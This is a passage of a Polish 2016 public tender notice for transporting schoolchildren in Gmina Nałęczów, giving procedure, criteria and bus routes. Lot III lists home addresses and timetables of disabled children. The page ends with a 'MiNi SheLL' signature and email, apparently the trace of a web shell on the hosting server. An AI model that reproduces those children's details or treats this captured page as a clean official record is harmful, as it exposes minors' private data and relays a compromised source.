              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie o spełnianiu warunków udziału w postępowaniu.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Oświadczenie, że oferowane usługi spełniają wymagania określone przez Zamawiającego.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Oświadczenie w zakresie art. 22, ust.1 ustawy Prawo zamówień publicznych.
2.Dokumenty potwierdzające posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje.
3.Wykaz wykonanych lub wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz z załączeniem dowodów, czy zostały wykonane lub  są wykonywane należycie. 
4.Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu wykonania zamówienia wraz z informacją 
o podstawie do dysponowania tymi zasobami.
5.Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia 
w szczególności odpowiedzialnych za świadczenie usług lub kierowanie robotami budowlanymi, wraz z informacjami  na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zmówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
6.Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
7. Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia 
w oparciu o art. 24, ust.1 pkt.2 ustawy Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu na składanie ofert.
8.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9.Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne 
i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
10.Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24, ust.2, pkt.5 ustawy Prawo zamówień publicznych, co Wykonawca albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej, o której mowa w art. 24, ust. 2, pkt. 5 ustawy Prawo zamówień publicznych.
11. Oferta Wykonawcy.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95.00</td></tr><tr><td>Wiek zaoferowanego do realizacji zamówienia taboru transportowego</td><td>5.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokonał wyboru Wykonawcy w przypadku:
a-	zmian organizacyjnych struktur wewnętrznych Wykonawcy lub zamawiającego,
b-	zmiany w zakresie wykazanych pojazdów, kierowców, opiekunów (pod warunkiem spełnienia wymagań określonych w Specyfikacji Istotnych Warunków Zamówienia),
c-	zmiany przepisów regulujących zakres umowy,
d-	zmiany przebiegu trasy dowozu/odwozu i rozkładu jazdy,
e-	gdy w chwili zawarcia niniejszej umowy nie były znane fakty mające na nią wpływ, przy jednoczesnym wykazaniu, że zakres zmian spowoduje następstwo korzystne dla Zamawiającego.
f-	zmiany liczby dowożonych uczniów.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 22/12/2016, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Specyfikację Istotnych Warunków Zamówienia można uzyskać także w siedzibie Zamawiającego nieodpłatnie. </div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Przedmiotem zamówienia jest dowożenie i odwożenie dzieci i uczniów zamieszkałych na terenie Gminy Nałęczów do placówek oświatowych  w okresie od 01.01.2017r. do 30.06.2018r. taborem wykonawców zgodnie z kalendarzem roku szkolnego 2016/2017 oraz 2017/2018, codziennie za wyjątkiem dni ustawowo wolnych od zajęć (ferii i dni świątecznych) pojazdami przystosowanymi do przewozu uczniów i dzieci. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dowóz uczniów i dzieci do i ze Szkoły Podstawowej 
w Nałęczowie i Gimnazjum w Nałęczowie oraz dzieci do i z Przedszkola w Nałęczowie, zamieszkałych w kol. Bochotnica  przed i za lasem, Antopolu oraz w Cynkowie wg niżej opisanej trasy dowozu i odwozu:
Dowóz  rano jeden kurs: 
ok. 7.14 odjazd z uczniami z Kol. Bochotnicy za lasem w pobliżu skrzyżowania drogi przez
              wieś z drogą dojazdową do wsi,
ok. 7.16 odjazd z Kol. Bochotnicy przed lasem,
ok. 7.22 odjazd z przystanku na drodze wiejskiej w Sadurkach (przy przepompowni),
ok. 7.23 odjazd z przystanku w Antopolu
ok. 7.30 odjazd z Cynkowa w pobliżu skrzyżowania drogi przez wieś z drogą na tzw. Mazurów a następnie z przystanków pośrednich w Cynkowie w pobliżu tablicy ogłoszeń, 
w Cynkowie przed mostem na rzece Bochotniczanka, z ul. Cynkowskiej  około 30 m 
od skrzyżowania z ulicą Bochotnica,
ok. 7.40 przyjazd do Szkoły Podstawowej w Nałęczowie i do Przedszkola  przystanek 
na ulicy E. Szelburg Zarembiny,
ok. 7.50 przyjazd do Gimnazjum Publicznego w Nałęczowie przy ul. Spółdzielczej 17.

Odwóz po południu  jeden kurs:
14.20 odjazd z uczniami i opiekunem z Gimnazjum Publicznego w Nałęczowie przy 
ul. Spółdzielczej 17,
ok. 14.30 odjazd ze Szkoły Podstawowej w Nałęczowie i z Przedszkola przystanek                 na ul. E. Szelburg  Zarembiny,
ok. 14.40 przyjazd do Cynkowa w pobliżu skrzyżowania drogi przez wieś  z drogą na tzw. Mazurów z uwzględnieniem przystanków jak przy trasie porannej,
ok. 14.47 przyjazd na przystanek do Antopola,
ok. 14.49 przyjazd na przystanek na drodze wiejskiej w Sadurkach (przy przepompowni)
ok. 14.55 przyjazd do Kol. Bochotnicy za lasem,

      Liczba dni dowozu i odwozu:
W okresie: styczeń  czerwiec 2017r. 	- 102 dni.
		 wrzesień  grudzień 2017r.	-  79 dni	
		 styczeń  czerwiec 2018r.	- 102 dni	
		 Razem 			- 283 dni
Długość jednej trasy dowozu  ok. 17 km.
Długość jednej trasy odwozu  ok. 17 km.
Długość trasy dowozu i odwozu w jednym dniu  ok. 34 km. 
Liczba dowożonych dzieci i uczniów - nie większa niż liczba dopuszczalnych osób 
w autobusie z 50 miejscami siedzącymi oprócz kierowcy. 
Liczba dni dowozu i odwozu,  miejsc przystanków oraz godzin odjazdu 
z poszczególnych przystanków może ulec nieznacznej zmianie w zależności od organizacji roku szkolnego, nieprzewidzianych przerw w nauce i uroczystości szkolnych.
Wykonawca zabezpiecza także opiekuna podczas dowozu i odwozu.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>60100000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95.00</td></tr><tr><td>Wiek zaoferowanego do realizacji zamówinia taboru transportowego</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Dowóz uczniów do i ze Szkoły Podstawowej w Piotrowicach zamieszkałych w Ludwinowie, Czesławicach oraz w Piotrowicach przed torami wg niżej opisanej trasy dowozu i odwozu i liczby dni dowozu  i odwozu:<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dowóz rano jeden kurs: 
	7.10 - wyjazd z opiekunem z pod budynku Szkoły Podstawowej w Piotrowicach 
w kierunku Ludwinowa i Czesławic,
	ok. 7.19 - odjazd z przystanku Nr 1 w Czesławicach naprzeciw nr 135, 
	ok. 7.22 - odjazd z przystanku naprzeciw domu Nr 93, 
	ok. 7.25  -odjazd z przystanku Nr 5 w Czesławicach (przy skrzyżowaniu dróg Nałęczów  Czesławice z drogą do Sadurek,
	ok. 7.28  odjazd z przystanku Nr 7 w Ludwinowie naprzeciw domu Nr 17,
	ok. 7.35  przyjazd do Szkoły Podstawowej w Piotrowicach,
	ok. 7.40  wyjazd z pod budynku Szkoły Podstawowej w Piotrowicach w kierunku wsi Piotrowice przed torami kolejowymi,
	ok. 7.45  odjazd z przystanku koło P. Zasady,
	ok. 7.48  odjazd z przystanku koło krzyża przy skrzyżowaniu z drogą polną, 
	ok. 7.50 - odjazd z przystanku przed skrzyżowaniem z drogą na Markuszów,
	ok. 7.55  przyjazd do Szkoły Podstawowej w Piotrowicach.

Odwóz po południu  jeden kurs
	  14.25 - odjazd z uczniami i opiekunem z pod budynku Szkoły Podstawowej 
              w Piotrowicach w kierunku wsi Piotrowice przed torami kolejowymi,
	14.30  przyjazd na przystanek przed skrzyżowaniem z drogą na Markuszów,
	14.32  przyjazd na przystanek koło krzyża przy skrzyżowaniu z drogą polną,
	14.35.  przyjazd na przystanek koło P. Zasady,
	14.40  przyjazd pod budynek Szkoły Podstawowej w Piotrowicach i odjazd 
             z uczniami i opiekunem  w kierunku Ludwinowa i Czesławic,
	ok. 14.47  przyjazd na przystanek Nr 7 w Ludwinowie Nr 17,
	ok. 14.50 - przyjazd na przystanek Nr 5 w Czesławicach przy skrzyżowaniu dróg      
                  Nałęczów  Czesławice z drogą do Sadurek,
	ok. 14.53  przyjazd na przystanek naprzeciw domu Nr 93, 
	ok. 14.56  przyjazd na przystanek Nr 1 w Czesławicach naprzeciw domu Nr 135  

Liczba dni dowozu i odwozu:
W okresie:  : styczeń  czerwiec 2017r.		- 102 dni
		    wrzesień  grudzień 2017r.	-  79 dni			
		    styczeń  czerwiec 2018r. 		- 102 dni
	    Razem				- 283 dni
Długość jednej trasy dowozu  ok. 20 km.
Długość jednej trasy odwozu  ok. 20 km.
Długość trasy dowozu i odwozu w jednym dniu  ok. 40 km. 
Liczba dowożonych uczniów nie większa niż liczba dopuszczalnych osób w Busie 
z liczbą miejsc niemniejszą  niż 19 oprócz kierowcy. 
Liczba dni dowozu i odwozu, tras dowozu,  miejsc przystanków oraz godzin odjazdu 
z poszczególnych przystanków może ulec nieznacznej zmianie w zależności od organizacji roku szkolnego, nieprzewidzianych przerw w nauce i uroczystości szkolnych oraz warunków atmosferycznych.
Wykonawca zabezpiecza także opiekuna podczas dowozu i odwozu.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>60100000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95.00</td></tr><tr><td>Wiek zaoferowanego do realizacji zamówienia taboru transportowego</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>Dowóz i odwóz niepełnosprawnych uczniów z miejsca zamieszkania do szkoły/przedszkola w Lublinie <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>	jednego ucznia zam. w Nałęczowie, ul. Charz Nr 21 do Specjalnego Ośrodka Szkolno-Wychowawczego Nr 2, ul. Głuska 5 w Lublinie (rozpoczęcie zajęć o godz. 800, zakończenie zajęć 1400  1500),
	jednej uczennicy zam.  w Czesławicach Nr 59 do Specjalnego Ośrodka Szkolno - Wychowawczego Nr 2, ul. Głuska 5 w Lublinie,
(rozpoczęcie zajęć codziennie o godz. 800, zakończenie zajęć 
o godz. 1200  w  poniedziałki, wtorki i czwartki dziecko ze szkoły odbierane będzie we własnym   zakresie przez matkę),
	jednego dziecka zam. w Czesławicach Nr 59 do Przedszkola  Integracyjnego Nr 39, ul. Balladyny 14 w Lublinie,  
(rozpoczęcie zajęć codziennie o godz. 800, zakończenie zajęć codziennie o godz. 1230),
Godziny zakończenia zajęć mogą ulec nieznacznej zmianie. Wg życzenia rodziców, w niektóre dni dzieci mogą być odbierane i odwożone przez rodziców.
Wykonawca zabezpiecza także opiekuna podczas dowozu i odwozu, którego obowiązkiem jest oprócz opieki podczas transportu pomoc każdemu uczniowi przy wsiadaniu i wysiadaniu z samochodu, doprowadzenie każdego ucznia do szkoły/przedszkola, pomoc w przebraniu/ubraniu w szatni i doprowadzenie do odpowiedniej uzgodnionej z przedstawicielem szkoły/przedszkola sali, a po zajęciach odbiór z sali, pomoc przy przebraniu w szatni i doprowadzenie do samochodu, a po przyjeździe do miejsca zamieszkania dziecka doprowadzenie dziecka do domu.
Szczegółowe godziny odbioru dzieci z miejsca zamieszkania i ze szkoły/przedszkola Przewoźnik tak ustali w porozumieniu z rodzicami aby można było je odebrać 
w czasie optymalnym dla wszystkich dzieci.


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>60100000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/06/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>95.00</td></tr><tr><td>Wiek zaoferowanego do realizacji zamówienia taboru transportowego</td><td>5.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com